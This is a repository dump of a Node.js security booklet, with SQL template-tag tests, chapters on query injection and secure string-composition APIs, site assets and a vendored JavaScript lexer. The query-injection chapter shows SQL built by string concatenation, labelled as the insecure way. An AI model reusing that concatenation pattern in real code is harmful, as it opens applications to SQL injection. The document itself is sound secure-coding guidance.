 93 |     it('numbers', () => {
 94 |       runTagTest(
 95 |         'SELECT 2',
 96 |         () => index.sql`SELECT ${1 + 1}`)
 97 |     })
 98 |     it('date', () => {
 99 |       runTagTest(
100 |         `SELECT '2000-01-01 00:00:00.000'`,
101 |         () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
102 |     })
103 |     it('string', () => {
104 |       runTagTest(
105 |         `SELECT 'Hello, World!\\n'`,
106 |         () => index.sql`SELECT ${'Hello, World!\n'}`)
107 |     })
108 |     it('identifier', () => {
109 |       runTagTest(
110 |         'SELECT `foo`',
111 |         () => index.sql`SELECT ${new index.Identifier('foo')}`)
112 |     })
113 |     it('fragment', () => {
114 |       const fragment = new index.SqlFragment('1 + 1')
115 |       runTagTest(
116 |         `SELECT 1 + 1`,
117 |         () => index.sql`SELECT ${fragment}`)
118 |     })
119 |     it('fragment no token merging', () => {
120 |       const fragment = new index.SqlFragment('1 + 1')
121 |       runTagTest(
122 |         `SELECT 1 + 1 FROM T`,
123 |         () => index.sql`SELECT${fragment}FROM T`)
124 |     })
125 |     it('string in dq string', () => {
126 |       runTagTest(
127 |         `SELECT "Hello, World!\\n"`,
128 |         () => index.sql`SELECT "Hello, ${'World!'}\n"`)
129 |     })
130 |     it('string in sq string', () => {
131 |       runTagTest(
132 |         `SELECT 'Hello, World!\\n'`,
133 |         () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
134 |     })
135 |     it('string after string in string', () => {
136 |       // The following tests check obliquely that '?' is not
137 |       // interpreted as a prepared statement meta-character
138 |       // internally.
139 |       runTagTest(
140 |         `SELECT 'Hello', "World?"`,
141 |         () => index.sql`SELECT '${'Hello'}', "World?"`)
142 |     })
143 |     it('string before string in string', () => {
144 |       runTagTest(
145 |         `SELECT 'Hello?', 'World?'`,
146 |         () => index.sql`SELECT 'Hello?', '${'World?'}'`)
147 |     })
148 |     it('number after string in string', () => {
149 |       runTagTest(
150 |         `SELECT 'Hello?', 123`,
151 |         () => index.sql`SELECT '${'Hello?'}', ${123}`)
152 |     })
153 |     it('number before string in string', () => {
154 |       runTagTest(
155 |         `SELECT 123, 'World?'`,
156 |         () => index.sql`SELECT ${123}, '${'World?'}'`)
157 |     })
158 |     it('string in identifier', () => {
159 |       runTagTest(
160 |         'SELECT `foo`',
161 |         () => index.sql`SELECT \`${'foo'}\``)
162 |     })
163 |     it('number in identifier', () => {
164 |       runTagTest(
165 |         'SELECT `foo_123`',
166 |         () => index.sql`SELECT \`foo_${123}\``)
167 |     })
168 |     it('array', () => {
169 |       const id = new index.Identifier('foo')
170 |       const frag = new index.SqlFragment('1 + 1')
171 |       const values = [ 123, 'foo', id, frag ]
172 |       runTagTest(
173 |         "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
174 |         () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
175 |     })
176 |   })
177 | })
178 | 


--------------------------------------------------------------------------------
/chapter-7/libraries.md:
--------------------------------------------------------------------------------
 1 | # Library support for Safe Coding Practices
 2 | 
 3 | The way we structure libraries and APIs affects the idioms that are
 4 | available to developers.
 5 | 
 6 | If the easiest ways to express ideas are also secure against a
 7 | particular class of attack, then developers who have seen ideas
 8 | expressed those ways will tend to produce code that is secure
 9 | against that class of attack.
10 | 
11 | Next, we introduce a few such idioms, show how they can be better
12 | addressed via a rarely used but powerful JavaScript
13 | feature, and end with some ideas on how to foster consistent,
14 | powerful, and secure APIs for a class of problems that often have
15 | security consequences: composing structured strings to send to
16 | external agents.
17 | 


--------------------------------------------------------------------------------
/chapter-7/query-langs.md:
--------------------------------------------------------------------------------
  1 | # Query injection
  2 | 
  3 | Threats: [QUI][]
  4 | 
  5 | One piece of simple advice to avoid [query injection attacks][QUI] is
  6 | "just use [prepared statements][]."
  7 | 
  8 | This is good advice, and the [`mysql`][] library has a
  9 | solid, well-documented API for producing secure prepared statements.
 10 | 
 11 | Developers could do
 12 | 
 13 | ```js
 14 | const mysql = require('mysql');
 15 | ...
 16 | connection.query(
 17 |     'SELECT * FROM T WHERE x = ?, y = ?, z = ?',
 18 |     [                          x,     y,     z],
 19 |     callback);
 20 | ```
 21 | 
 22 | which is secure since `.query` calls `mysql.format` under the hood
 23 | to escape `x`, `y`, and `z`.  Enough developers still do
 24 | 
 25 | ```js
 26 | connection.query(
 27 |     "SELECT * FROM T WHERE x = '" + x + "', y = '" + y + "', z='" + z + "'",
 28 |     callback);
 29 | ```
 30 | 
 31 | to make query injection a real problem.
 32 | 
 33 | 
 34 | Developers may not know about prepared statements, but prepared
 35 | statements have other problems:
 36 | 
 37 | *  They rely on a **correspondence between positional parameters**
 38 |    and the '`?`' placeholders that they fill.  When a prepared statement
 39 |    has more substitutions than fit in a reader's working memory, they
 40 |    have to look back and forth between the prepared statement, and the
 41 |    parameter list.
 42 | *  Prepared statements do not make it easy to **compose a query** from
 43 |    simpler query fragments.  It's not easy to compute the `WHERE`
 44 |    clause separately from the result column set and then combine the
 45 |    two into a query without resorting to string concatenation
 46 |    somewhere along the line.
 47 | 
 48 | 
 49 | ## Template literals
 50 | 
 51 | JavaScript has a rarely used feature that lets us get the best of
 52 | both worlds.
 53 | 
 54 | 
 55 | ```js
 56 | connection.query`SELECT * FROM T WHERE x = ${x}, y = ${y}, z = ${z}`(callback)
 57 | ```
 58 | 
 59 | uses a [tagged template literal][] to allow inline expressions in SQL
 60 | syntax.
 61 | 
 62 | > A more advanced form of template literals are tagged template
 63 | > literals. Tags allow you to parse template literals with a
 64 | > function. The first argument of a tag function contains an array of
 65 | > string values. The remaining arguments are related to the
 66 | > expressions. In the end, your function can return your manipulated
 67 | > string (or it can return something completely different ...).
 68 | 
 69 | The code above is almost equivalent to
 70 | 
 71 | ```js
 72 | connection.query(
 73 |     ['SELECT * FROM T WHERE x = ', ', y = ', ', z = ', ''],
 74 |                                   x,        y,        z
 75 | )(callback);
 76 | ```
 77 | 
 78 | `connection.query` gets called with the parts of the static
 79 | template string specified by the author, followed by the results of
 80 | the expressions.  The final `(callback)` dispatches the query.
 81 | 
 82 | We can tweak SQL APIs so that, when used as template literal tags,
 83 | they escape the dynamic parts to preserve the intent of the author of
 84 | the static parts, and then re-interleave them to produce the query.
 85 | 
 86 | The example ([code][sql-code]) accompanying this chapter implements
 87 | this idea by defining a `mysql.sql` function that parses the static
 88 | parts to choose appropriate escapers for the dynamic parts.
 89 | We have put together a [draft PR][mysql-PR] to integrate this into
 90 | the *mysql* module.
 91 | 
 92 | It also provides string wrappers, `Identifier` and `SqlFragment`, to
 93 | make it easy to compose complex queries from simpler parts:
 94 | 
 95 | ```js
 96 | // Compose a query from two fragments.
 97 | // When the value inside ${...} is a SqlFragment, no extra escaping happens.
 98 | connection.query`
 99 |     SELECT ${outputColumnsAndJoins(a, b, c)}
100 |     WHERE  ${rowFilter(x, y, z)}
101 | `(callback)
102 | 
103 | // Returns a SqlFragment
104 | function rowFilter(x, y, z) {
105 |   if (complexCondition) {
106 |     // mysql.sql returns a SqlFragment
107 |     return mysql.sql`X = ${x}`;
108 |   } else {
109 |     return mysql.sql`Y = ${y} AND Z=${z}`;
110 |   }
111 | }
112 | 
113 | function outputColumnsAndJoins(a, b, c) {
114 |   return mysql.sql`...`;
115 | }
116 | ```
117 | 
118 | ----
119 | 
120 | Our goal was to make the easiest way to express an idea a secure way.
121 | 
122 | As shown below, this template tag API is the shortest way to express
123 | this idea.  It is also tolerant to small variations
124 | &mdash; the author may leave out quotes since the tag implementation
125 | knows whether a substitution is inside quotes.
126 | 
127 | Shorter & tolerant != easier, but we hope that being shorter, more
128 | robust, more secure, and easy to compose will make it a good migration
129 | target for teams that realize they have a problem with SQL injection.
130 | We also hope these factors will cause developers who have been through
131 | such a migration to continue to use it in subsequent projects where it
132 | may spread to other developers.
133 | 
134 | 
135 | ```js
136 | // Proposed: Secure, tolerant, composes well.
137 | connection.query`SELECT * FROM T WHERE x=${x}`(callback)
138 | connection.query`SELECT * FROM T WHERE x="${x}"`(callback)
139 | 
140 | // String concatenation.  Insecure, composes well.
141 | connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
142 | connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)
143 | 
144 | // String concatenation is not tolerant.
145 | // Broken in a way that will be caught during casual testing.
146 | connection.query('SELECT * FROM T WHERE x = ' + x, callback)
147 | connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)
148 | 
149 | // Prepared Statements.  Secure, composes badly, positional parameters.
150 | connection.query('SELECT * FROM T WHERE x = ?', x, callback)
151 | connection.query('SELECT * FROM T WHERE x = "?"', x, callback)  // Subtly broken
152 | ```
153 | 
154 | 
155 | 
156 | [`mysql`]: https://www.npmjs.com/package/mysql
157 | [QUI]: ../chapter-1/threat-QUI.md
158 | [prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
159 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
160 | [sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
161 | [mysql-PR]: https://github.com/mysqljs/mysql/pull/1926
162 | 


--------------------------------------------------------------------------------
/chapter-7/structured-strings.md:
--------------------------------------------------------------------------------
  1 | # Structured Strings
  2 | 
  3 | Both of the previously discussed problems, query injection and shell
  4 | injection, are facets of a common problem: it is hard to securely
  5 | compose strings to send outside the process.  In the first case,
  6 | we send a query string to a database via a file descriptor bound to a
  7 | network socket or an IPC endpoint.  In the second, we send a string
  8 | via a syscall wrapper, to spawn a child process.
  9 | 
 10 | ## Success Criteria
 11 | 
 12 | We can securely compose strings for external endpoints if:
 13 | 
 14 | *  Developers routinely use tools to produce structured strings
 15 |    that preserve developers' intent even in the face of inputs
 16 |    crafted by a skilled attacker, and/or
 17 | *  Where developers do not, the backends grant no authority based on
 18 |    the structure of the string, and the authority granted ambiently is
 19 |    so small as to not be abusable.
 20 | 
 21 | Nailing down the definition of *intent* is hard, but here's an example
 22 | of how we can in one context.  Consider
 23 | 
 24 | ```js
 25 | "SELECT * FROM T WHERE id=" + f(accountNumber)
 26 | ```
 27 | 
 28 | A reasonable reader would conclude that the author intended:
 29 | 
 30 | *  That the result specifies one statement, a select statement.
 31 | *  That `f(accountNumber)` specifies only a simple value that
 32 |    can be compared to values in the *id* column.
 33 | 
 34 | Given that, we can say `function f(x)` preserves intent in that code
 35 | if, for any value of `accountNumber`, it throws an exception or
 36 | its output following "`SELECT * FROM T WHERE id=`" parses as a
 37 | single number or string literal token.
 38 | 
 39 | 
 40 | 
 41 | ## A possible solution
 42 | 
 43 | ### Change the world so we can give simple answers to hard questions.
 44 | 
 45 | Extend existing APIs so that whenever a developer is composing a
 46 | string to send outside the `node` process, they have a template
 47 | literal tag based API that is more secure than string concatenation.
 48 | 
 49 | Then, we can give developers a simple piece of advice:
 50 | 
 51 | > If you're composing a string that will end up outside node, use
 52 | > a template tag.
 53 | 
 54 | Template tags will have implementation bugs, but fixing one template
 55 | tag is easier than fixing many expressions of the form
 56 | `("foo " + bar + " baz")`.
 57 | 
 58 | 
 59 | ### A common style guide for tag implementers.
 60 | 
 61 | It would help developers if these template literal tags had some
 62 | consistency across libraries.  We've already briefly discussed ways to
 63 | make template tags more discoverable and usable when talking about
 64 | ways to treat [generated code][synthetic modules] as first class.
 65 | 
 66 | We propose a style guide for tag authors.
 67 | Others will probably have better ideas as to what it should contain, but
 68 | to get a discussion started:
 69 | 
 70 | -  Functions that compose or represent a string whose recipient is outside
 71 |    the node runtime should accept template tags.
 72 |    Examples include `mysql.format` which composes a string of SQL.
 73 | -  These functions should return a typed string wrapper.
 74 |    For example, if the output is a string of *SQL* tokens,
 75 |    then return an instance of:
 76 |    ```js
 77 |    function SqlFragment(s) {
 78 |      if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
 79 |      this.content = String(s);
 80 |    }
 81 |    SqlFragment.prototype.toString = function () { return this.content; };
 82 |    ```
 83 |    Don't re-escape `SqlFragment`s received as interpolation values
 84 |    where they make sense.
 85 | -  See if you can reuse string wrappers from a library before rolling
 86 |    your own to encourage interoperability.
 87 |    If a library defines a type representing a fragment of HTML, use that
 88 |    as long as your operator can uphold the type's contract.
 89 |    For example if the type has a particular [security contract][],
 90 |    make sure that you preserve that security contract.
 91 |    You may assume that wrapped strings come from a source that upheld
 92 |    the contract.
 93 |    Producing a value that doesn't uphold its contract when your inputs do
 94 |    is a bug, but assuming incorrectly that type contracts hold for your
 95 |    inputs is not.
 96 |    If you can double check inputs, great!
 97 | -  The canonical way to test whether a function was (very probably)
 98 |    called as a template tag is
 99 |    ```js
100 |    function (a, ...b) {
101 |      if (Array.isArray(a) && Array.isArray(a.raw)
102 |          && Object.isFrozen(a)
103 |          && a.length === b.length + 1) {
104 |        // Treat as template tag.
105 |      }
106 |      // Handle non template tag use.
107 |    }
108 |    ```
109 | -  When a template tag takes options objects, it should
110 |    be possible to curry those before invoking the function as a tag.
111 |    The following passes some environment variables and a working directory
112 |    before the command:
113 |    ```js
114 |    shelljs.exec({ env: ..., cwd: ... })`cat ...`
115 |    ```
116 | -  When a template tag takes a `callback`, the template tag should
117 |    return a function that will receive the callback.
118 |    The following uses a template tag that returns a function that
119 |    takes a callback:
120 |    ```js
121 |    myConnection.query`SELECT ...`(callback)
122 |    ```
123 | -  Where possible, allow indenting multi-line template tags.
124 |    Use the first line with non-whitespace characters as a cue
125 |    when stripping whitespace from the rest of the lines.
126 | 
127 | ## Alternatives
128 | 
129 | Database abstractions like object-relational mappings are a great way
130 | to get developers out of the messy business of composing queries.
131 | 
132 | There are still niche use cases like ad-hoc reporting that require
133 | composing queries, and solving the problem for database queries does
134 | not solve it for strings sent elsewhere, e.g. shells.
135 | 
136 | Builder APIs provide a flexible way to compose structured content.
137 | For example,
138 | 
139 | ```java
140 |   new QueryBuilder()
141 |   .select()
142 |   .innerJoin(...).on(...)
143 |   .columns(...)
144 |   .where(...)
145 |   .orderBy(...)
146 |   .build()
147 | ```
148 | 
149 | The explicit method calls specify the structure of the resulting
150 | string, so controlling parameters doesn't grant control of sentence
151 | structure, and control of one parameter doesn't allow reinterpreting
152 | part of the query specified by an uncontrolled parameter.
153 | 
154 | In JavaScript we prefer tagged templates to builders.  Builder APIs can
155 | be syntactically heavy and developers have to discover and learn them.
156 | We hope that adoption of template tags will be easier because:
157 | 
158 | *  Tagged templates are syntactically lighter so easier to write.
159 | *  Someone unfamiliar with the API, but familiar with the query language,
160 |    can use their knowledge of the language to understand the API, which
161 |    makes tagged templates easier to read and adapt for one's own work.
162 | *  Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
163 |    as strings unless there is a builder API for the sub-language.
164 | 
165 | 
166 | [security contract]: https://github.com/google/safe-html-types
167 | [synthetic modules]: ../chapter-2/synthetic-modules.html
168 | 


--------------------------------------------------------------------------------
/cover.md:
--------------------------------------------------------------------------------
 1 | # A Roadmap for Node.js Security
 2 | 
 3 | Node.js has a vibrant community of application developers and library
 4 | authors built around a mature and well-maintained core runtime and
 5 | library set.  Its growing popularity is already drawing more attention
 6 | from attackers.  This roadmap discusses how some Node.js projects
 7 | address security challenges, along with ways to make it easier
 8 | for more projects to address these challenges in a thorough and
 9 | consistent manner.
10 | 
11 | This is not the opinion of any organization.  It is the considered
12 | opinion of
13 | [some computer security professionals and Node.js enthusiasts][contributors]
14 | who have worked to make it easier to write secure, robust software on
15 | other platforms; who like a lot about Node.js; and who would like to
16 | help make it better.
17 | 
18 | Our intended audience is Node.js library and infrastructure
19 | maintainers who want to stay ahead of the increased scrutiny that
20 | Node.js is getting from attackers.  We have not researched whether,
21 | and do not assert that, any stack is inherently more or less secure
22 | than any other.
23 | 
24 | Node.js security is especially important for “primary targets”.
25 | Targets are often subdivided into "primary targets" and "targets of
26 | opportunity."  One attacks the latter if one happens to see a
27 | vulnerability.  One goes out of their way to find vulnerabilities in
28 | the former.  The practices which prevent one from becoming a target of
29 | opportunity might not be enough if one is a primary target of an actor
30 | with resources at their disposal.  We hope that the ideas we present
31 | might help primary targets to defeat attacks while making targets of
32 | opportunity rarer and the entire ecosystem more secure.
33 | 
34 | When addressing threats, we want to make sure we preserve Node.js's
35 | strengths.
36 | 
37 | *  Development teams can iterate quickly allowing them to explore a
38 |    large portion of the design space.
39 | *  Developers can use a wealth of publicly available packages to solve
40 |    everyday problems.
41 | *  Anyone who identifies a shared problem can write and publish a
42 |    module to solve it, or send a pull request with a fix or extension
43 |    to an existing project.
44 | *  Node.js integrates with a wide variety of application containers so
45 |    project teams have options when deciding how to deploy.
46 | *  Using JavaScript on the front and back ends of Web applications
47 |    allows developers to work both sides when need be.
48 | 
49 | The individual chapters are largely independent of one another:
50 | 
51 | "[Threat environment][]" discusses the kinds of threats that concern us.
52 | 
53 | "[Dynamism when you need it][]" discusses how to preserve the power of
54 | CommonJS module linking, `vm` contexts, and runtime code generation
55 | while making sure that, in production, only code that the development
56 | team trusts gets run.
57 | 
58 | "[Knowing your dependencies][]" discusses ways to help development
59 | teams make informed decisions about third-party dependencies.
60 | 
61 | "[Keeping your dependencies close][]" discusses how keeping a local
62 | replica of portions of the larger npm repository affects security and
63 | aids incident response.
64 | 
65 | "[Oversight][]" discusses how code-quality tools can help decouple
66 | security review from development.
67 | 
68 | "[When all else fails][]" discusses how the development &rarr;
69 | production pipeline and development practices can affect the ability
70 | of security professionals to identify and respond to imminent threats.
71 | 
72 | "[Library support for safe coding practices][]" discusses idioms
73 | that, if more widespread, might make it easier for developers to
74 | produce secure, robust systems.
75 | 
76 | You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.
77 | 
78 | [contributors]: CONTRIBUTORS.md
79 | [Threat environment]: chapter-1/threats.md
80 | [Dynamism when you need it]: chapter-2/dynamism.md
81 | [Knowing your dependencies]: chapter-3/knowing_dependencies.md
82 | [Keeping your dependencies close]: chapter-4/close_dependencies.md
83 | [Oversight]: chapter-5/oversight.md
84 | [When all else fails]: chapter-6/failing.md
85 | [Library support for safe coding practices]: chapter-7/libraries.md
86 | [github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/
87 | 


--------------------------------------------------------------------------------
/images/FileExternal.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!--
 3 | Per https://commons.wikimedia.org/wiki/File%3AExternal.svg
 4 | By Denelson83 (Own work) [Public domain], via Wikimedia Commons
 5 | -->
 6 | <svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
 7 | <path fill="#FFF" stroke="#06D" stroke-width="10"
 8 | d="m43,35H5v60h60V57M45,5v10l10,10-30,30 20,20 30-30 10,10h10V5z"/>
 9 | </svg>
10 | 


--------------------------------------------------------------------------------
/images/GitHub-Mark-32px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/GitHub-Mark-32px.png


--------------------------------------------------------------------------------
/images/ic_print_24dp.svg:
--------------------------------------------------------------------------------
1 | <svg xmlns="http://www.w3.org/2000/svg" width="24px" height="24px" viewBox="0 0 24 24" fill="#ccc">
2 |     <path d="M19 8H5c-1.66 0-3 1.34-3 3v6h4v4h12v-4h4v-6c0-1.66-1.34-3-3-3zm-3 11H8v-5h8v5zm3-7c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1zm-1-9H6v4h12V3z"/>
3 |     <path d="M0 0h24v24H0z" fill="none"/>
4 | </svg>
5 | 


--------------------------------------------------------------------------------
/images/npmjs-node.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/google/node-sec-roadmap/8e01b94ee2a7bbae9c9f758131fd421e2a1c8aa6/images/npmjs-node.png


--------------------------------------------------------------------------------
/license.md:
--------------------------------------------------------------------------------
1 | <!-- Markdown licensed under CC-BY-4.0
2 |      Supporting code licensed under Apache License 2.0 -->
3 | 
4 | <!-- HTML courtesy https://creativecommons.org/ -->
5 | <a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">A Roadmap for Node.js Security</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://github.com/google/node-sec-roadmap/" property="cc:attributionName" rel="cc:attributionURL">https://github.com/google/node-sec-roadmap/</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.
6 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "version": "1.0.0",
 3 |   "name": "@mikesamuel/nodejs_sec_book",
 4 |   "description": "Booklet about NodeJS in organizations with large security profiles",
 5 |   "homepage": "https://github.com/google/node-sec-roadmap/",
 6 |   "license": "(Apache-2.0 OR CC-BY-4.0)",
 7 |   "author": {
 8 |     "name": "Mike Samuel",
 9 |     "email": "mikesamuel@gmail.com",
10 |     "url": "https://github.com/mikesamuel"
11 |   },
12 |   "files": [
13 |     "www/**"
14 |   ],
15 |   "main": "www/index.html",
16 |   "dependencies": {
17 |     "gitbook": ">=3.2.3",
18 |     "gitbook-cli": ">=2.3.2",
19 |     "gitbook-plugin-ga": "^1.0.1",
20 |     "gitbook-plugin-links": "^3.0.1",
21 |     "svgexport": "^0.3.2"
22 |   },
23 |   "private": true,
24 |   "scripts": {
25 |     "start": "make serve"
26 |   }
27 | }
28 | 


--------------------------------------------------------------------------------
/styles/website.css:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | .print-button.btn.links-link {
19 |     display: inline-block;
20 |     width: 30px;
21 |     font-size: 0;
22 |     background-image: url("/images/ic_print_24dp.svg");
23 |     background-repeat: no-repeat;
24 |     background-position: center center;
25 | }
26 | 
27 | .github-button.btn.links-link {
28 |     display: inline-block;
29 |     width: 30px;
30 |     font-size: 0;
31 |     background-image: url("/images/GitHub-Mark-32px.png");
32 |     background-repeat: no-repeat;
33 |     background-position: center center;
34 |     background-size: 20px;
35 |     opacity: 0.25;
36 | }
37 | 
38 | /* Style external links */
39 | a[href^="http://"]:not([href^="http://www.gitbook.com"]),
40 | a[href^="https://"]:not([href^="https://www.gitbook.com"]),
41 | a[href^="//"]:not([href^="//www.gitbook.com"]) {
42 |     background-image: url("/images/FileExternal.svg");
43 |     background-position: center right;
44 |     background-repeat: no-repeat;
45 |     background-size: 12px 12px;
46 |     padding-right: 14px;
47 | }
48 | 


--------------------------------------------------------------------------------
/third_party/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/third_party/jslex/__init__.py:
--------------------------------------------------------------------------------
 1 | # Copyright 2017 Google LLC
 2 | #
 3 | # Licensed under the Apache License, Version 2.0 (the "License");
 4 | # you may not use this file except in compliance with the License.
 5 | # You may obtain a copy of the License at
 6 | #
 7 | #     https://www.apache.org/licenses/LICENSE-2.0
 8 | #
 9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 | 


--------------------------------------------------------------------------------
/third_party/jslex/jslex.py:
--------------------------------------------------------------------------------
  1 | # Copyright 2011-2015 Ned Batchelder.  All rights reserved.
  2 | #
  3 | # Except where noted otherwise, this software is licensed under the Apache
  4 | # License, Version 2.0 (the "License"); you may not use this work except in
  5 | # compliance with the License.  You may obtain a copy of the License at
  6 | #
  7 | #     http://www.apache.org/licenses/LICENSE-2.0
  8 | #
  9 | # Unless required by applicable law or agreed to in writing, software
 10 | # distributed under the License is distributed on an "AS IS" BASIS,
 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 12 | # See the License for the specific language governing permissions and
 13 | # limitations under the License.
 14 | 
 15 | # From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
 16 | # For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt
 17 | 
 18 | 
 19 | """JsLex: a lexer for Javascript"""
 20 | 
 21 | import re
 22 | 
 23 | class Tok(object):
 24 |     """A specification for a token class."""
 25 | 
 26 |     num = 0
 27 | 
 28 |     def __init__(self, name, regex, next=None):
 29 |         self.id = Tok.num
 30 |         Tok.num += 1
 31 |         self.name = name
 32 |         self.regex = regex
 33 |         self.next = next
 34 | 
 35 | def literals(choices, prefix="", suffix=""):
 36 |     """Create a regex from a space-separated list of literal `choices`.
 37 | 
 38 |     If provided, `prefix` and `suffix` will be attached to each choice
 39 |     individually.
 40 | 
 41 |     """
 42 |     return "|".join(prefix+re.escape(c)+suffix for c in choices.split())
 43 | 
 44 | class Lexer(object):
 45 |     """A generic multi-state regex-based lexer."""
 46 | 
 47 |     def __init__(self, states, first):
 48 |         self.regexes = {}
 49 |         self.toks = {}
 50 | 
 51 |         for state, rules in states.items():
 52 |             parts = []
 53 |             for tok in rules:
 54 |                 groupid = "t%d" % tok.id
 55 |                 self.toks[groupid] = tok
 56 |                 parts.append("(?P<%s>%s)" % (groupid, tok.regex))
 57 |             self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE)
 58 | 
 59 |         self.state = first
 60 | 
 61 |     def lex(self, text):
 62 |         """Lexically analyze `text`.
 63 | 
 64 |         Yields pairs (`name`, `tokentext`).
 65 | 
 66 |         """
 67 |         end = len(text)
 68 |         state = self.state
 69 |         regexes = self.regexes
 70 |         toks = self.toks
 71 |         start = 0
 72 | 
 73 |         while start < end:
 74 |             for match in regexes[state].finditer(text, start):
 75 |                 name = match.lastgroup
 76 |                 tok = toks[name]
 77 |                 toktext = match.group(name)
 78 |                 start += len(toktext)
 79 |                 yield (tok.name, toktext)
 80 | 
 81 |                 if tok.next:
 82 |                     state = tok.next
 83 |                     break
 84 | 
 85 |         self.state = state
 86 | 
 87 | 
 88 | class JsLexer(Lexer):
 89 |     """A Javascript lexer
 90 | 
 91 |     >>> lexer = JsLexer()
 92 |     >>> list(lexer.lex("a = 1"))
 93 |     [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]
 94 | 
 95 |     This doesn't properly handle non-Ascii characters in the Javascript source.
 96 | 
 97 |     """
 98 | 
 99 |     # Because these tokens are matched as alternatives in a regex, longer possibilities
100 |     # must appear in the list before shorter ones, for example, '>>' before '>'.
101 |     #
102 |     # Note that we don't have to detect malformed Javascript, only properly lex
103 |     # correct Javascript, so much of this is simplified.
104 | 
105 |     # Details of Javascript lexical structure are taken from
106 |     # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf
107 | 
108 |     # A useful explanation of automatic semicolon insertion is at
109 |     # http://inimino.org/~inimino/blog/javascript_semicolons
110 | 
111 |     both_before = [
112 |         Tok("comment",      r"/\*(.|\n)*?\*/"),
113 |         Tok("linecomment",  r"//.*?$"),
114 |         Tok("ws",           r"\s+"),
115 |         Tok("keyword",      literals("""
116 |                                 break case catch class const continue debugger
117 |                                 default delete do else enum export extends
118 |                                 finally for function if import in instanceof new
119 |                                 return super switch this throw try typeof var
120 |                                 void while with
121 |                                 """, suffix=r"\b"), next='reg'),
122 |         Tok("reserved",     literals("null true false", suffix=r"\b"), next='div'),
123 |         Tok("id",           r"""
124 |                             ([a-zA-Z_$   ]|\\u[0-9a-fA-Z]{4})       # first char
125 |                             ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})*      # rest chars
126 |                             """, next='div'),
127 |         Tok("hnum",         r"0[xX][0-9a-fA-F]+", next='div'),
128 |         Tok("onum",         r"0[0-7]+"),
129 |         Tok("dnum",         r"""
130 |                             (   (0|[1-9][0-9]*)         # DecimalIntegerLiteral
131 |                                 \.                      # dot
132 |                                 [0-9]*                  # DecimalDigits-opt
133 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
134 |                             |
135 |                                 \.                      # dot
136 |                                 [0-9]+                  # DecimalDigits
137 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
138 |                             |
139 |                                 (0|[1-9][0-9]*)         # DecimalIntegerLiteral
140 |                                 ([eE][-+]?[0-9]+)?      # ExponentPart-opt
141 |                             )
142 |                             """, next='div'),
143 |         Tok("punct",        literals("""
144 |                                 >>>= === !== >>> <<= >>= <= >= == != << >> && 
145 |                                 || += -= *= %= &= |= ^=
146 |                                 """), next="reg"),
147 |         Tok("punct",        literals("++ -- ) ]"), next='div'),
